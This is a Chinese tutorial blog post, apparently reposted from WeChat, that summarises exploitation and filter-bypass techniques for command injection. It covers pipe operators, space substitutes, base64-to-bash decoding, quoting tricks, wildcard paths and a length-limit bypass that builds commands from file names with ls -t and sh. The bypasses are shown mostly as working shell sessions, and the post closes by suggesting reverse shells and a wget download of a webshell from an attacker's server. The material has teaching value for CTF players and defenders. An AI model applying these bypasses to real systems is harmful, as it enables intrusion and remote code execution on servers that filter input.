命令执行漏洞利用及绕过方式总结
2023-4-5 09:9:46 Author: 编码安全研究(查看原文) 阅读量:15 收藏

1.常见管道符

  Windows系统支持的管道符

  Linux系统支持的管道符

2.空格过滤

  ${IFS}

  重定向符<>

  %09(需要php环境)

3.黑名单绕过

  拼接

  base64编码

  单引号,双引号

  反斜线

  $1,$2等和[email protected]

4.读文件绕过

5.通配符绕过

6.内敛执行绕过

7.绕过长度限制

  Linux中的>符号和>>符号

  Linux中命令换行

  利用ls -t和>以及换行符绕过长度限制执行命令(文件构造绕过)

1.常见管道符

Windows系统支持的管道符

|直接执行后面的语句

||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

&前面和后面命令都要执行,无论前面真假

&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

Linux系统支持的管道符

|、||、&、&&这四种管道符都存在且用法和Windows系统下一样,多了一个;管道符,作用和&一样

2.空格过滤

${IFS}

payload1:

payload2:

payload3:

重定向符<>

payload1:

payload2:

%09(需要php环境)

黑名单绕过

拼接

base64编码

payload1:

[email protected]:~# `echo "Y2F0IGZsYWc="|base64 -d`
this is your flag

payload2:

[email protected]:~# echo "Y2F0IGZsYWc="|base64 -d|bash
this is your flag

单引号,双引号

反斜线

$1,$2等和[email protected]

读文件绕过

当cat被过滤时,可以使用如下命令代替

 1 (1)more:一页一页的显示档案内容
2 (2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
3 (3)head:查看头几行
4 (4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
5 (5)tail:查看尾几行
6 (6)nl:显示的时候,顺便输出行号
7 (7)od:以二进制的方式读取档案内容
8 (8)vi:一种编辑器,这个也可以查看
9 (9)vim:一种编辑器,这个也可以查看
10 (10)sort:可以查看
11 (11)uniq:可以查看
12 (12)file -f:报错出具体内容

通配符绕过

比如

 1 [email protected]:~# /???/?[a][t] ?''?''?''?''
2 this is your flag
3 xx
4 cc
5 xa
6 /bin/cat: test: 是一个目录
7 [email protected]:~# /???/?at flag
8 this is your flag
9 xx
10 cc
11 xa
12 [email protected]:~# /???/?at ????
13 this is your flag
14 xx
15 cc
16 xa
17 /bin/cat: test: 是一个目录
18 [email protected]:~# /???/?[a]''[t] ?''?''?''?''
19 this is your flag
20 xx
21 cc
22 xa
23 /bin/cat: test: 是一个目录

内敛执行绕过

`命令`和$(命令)都是执行命令的方式

绕过长度限制

Linux中的>符号和>>符号

(1)通过>来创建文件

(2)通过>将命令结果存入文件中
使用>命令会将原有文件内容覆盖,如果是存入不存在的文件名,那么就会新建该文件再存入

(3)>>符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容

Linux中命令换行

在Linux中,当我们执行文件中的命令的时候,我们通过在没有写完的命令后面加\,可以将一条命令写在多行
比如一条命令cat flag可以如下表示

既然可以这样那我们是不是可以在某些限制长度的情况下执行命令,将命令一条一条输入一个文本中再执行,尝试一下

[email protected]:~# echo "ca\\">cmd
[email protected]:
~# echo "t\\">>cmd
[email protected]:
~# echo " fl\\">>cmd
[email protected]:
~# echo "ag">>cmd
[email protected]:
~# cat cmd
ca\
t\
fl\
ag
[email protected]:
~# sh cmd
this is your flag

用这种方法可以绕过一些长度限制读取文件内容

利用ls -t和>以及换行符绕过长度限制执行命令(文件构造绕过)

linux中,我们使用ls -t命令后,可以将文件名按照时间顺序排列出来(后创建的排在前面)

[email protected]:~/example# touch a
[email protected]:
~/example# touch b
[email protected]:
~/example# touch c
[email protected]:
~/example# ls -t
c b a

我们来看看ls -t>ghtwf01有什么效果(开始不存在ghtwf01这个文件)

[email protected]:~/example# ls -t>ghtwf01
[email protected]:
~/example# cat ghtwf01
ghtwf01
c
b
a

这条命令先执行了创建ghtwf01文件然后将ls -t的执行结果写入ghtwf01文件
我们试试用这些方法来执行命令cat flag

[email protected]:~/example# > "ag"
[email protected]:
~/example# > "fl\\"
[email protected]:
~/example# > "t \\"
[email protected]:
~/example# > "ca\\"
[email protected]:
~/example# ls -t
'ca\' 't \' 'fl\' ag flag
[email protected]:~/example# ls -t > a
[email protected]:
~/example# sh a
a:
1: a: not found
this is your flag
a:
6: flag: not found

读取到了flag内容为this is your flag,无论这个文件里面有不有其它内容都能执行
总而言之文件构造绕过就是如下知识:

linux下可以用 1>a创建文件名为a的空文件
ls
-t>test则会将目录按时间排序后写进test文件中
sh命令可以从一个文件中读取命令来执行

反弹shell命令比较长就可以用这种方式去绕过长度限制
如果服务器能连外网还可以使用命令wget 网址 -O shell.php去执行我们自己vps上面的木马文件。

参考:https://www.ghtwf01.cn/index.php/archives/273/作者:My_Dreams原文链接:https://www.cnblogs.com/zzjdbk/p/13491028.html
注:如有侵权请联系删除

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧。

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY1MDc2Mg==&mid=2247502108&idx=1&sn=79715298133cac1fa402758c8facc769&chksm=ce649a79f913136fa790c3ca81b80114f94f43b60edb4816fce9ea08f3e6b952413aa8013490#rd
如有侵权请联系:admin#unsafe.sh